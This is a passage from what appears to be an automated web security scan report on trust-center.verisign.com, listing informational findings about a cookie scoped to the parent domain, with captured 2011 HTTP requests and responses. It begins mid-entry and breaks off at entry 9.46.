HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:46 GMT Server: ApacheSet-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.33. https://trust-center.verisign.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:45 GMT Server: ApacheSet-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 4710 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/x-icon ...... ..........F... ......................h...............(...>...(... ...@....................................... ................. !....)...9.'&'.(*&.)*(.44-.=?8.BC?...U...]...a. d...i. .h......[SNIP]...
9.34. https://trust-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: ApacheSet-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
9.35. https://trust-center.verisign.com/process/retail/help_and_support
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/help_and_support
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/help_and_support HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:53 GMT Server: ApacheSet-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 138732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
9.36. https://trust-center.verisign.com/process/retail/redirect
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/redirect
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/redirect HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:00 GMT Server: ApacheSet-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.37. https://trust-center.verisign.com/process/retail/session_timeout
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/session_timeout
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/session_timeout HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:59:40 GMT Server: ApacheSet-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
9.38. https://trust-center.verisign.com/process/retail/trust_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_initial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:26:31 GMT Server: ApacheSet-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001 Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
9.39. https://trust-center.verisign.com/process/retail/trust_product_selector
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]...
9.40. https://trust-center.verisign.com/process/retail/trust_product_selector.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector.do
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector.do HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:02 GMT Server: ApacheSet-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.41. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/TeaLeafTarget.html
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /rcm/TeaLeafTarget.html HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 Content-Length: 1103 X-TeaLeaf-Page-Objects: 0 Origin: https://trust-center.verisign.com X-TeaLeaf-Page-Img-Fail: 1 X-TeaLeaf-Page-Render: 123 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: undefined; INIT X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941 X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719 <ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" > ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:10 GMT Server: ApacheSet-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 32 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html <html> <body> OK </body> </html>
9.42. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/arrow_progressBar_gray.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 91 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a...............................!.......,.......... hs......+RR.N...}...XF.M4....1...;
9.43. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/arrow_progressBar_red.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 90 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.........3....d.....2Y........!.......,...........(e.......RR.L...}Z..XF.M4.. .M..;
9.44. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/divider.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/divider.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 44 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.. ..........!.......,...... ........;
9.45. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/ico_questionmark.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 374 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....-......8..F.#O.....I.=.2Q.Wu..:...............1Z.\}.*U..B.%K.Bh....Mn....-Q....x.....n..{..n..h}.........................x.....q...4..........................................................[SNIP]...
9.46. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/logo.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
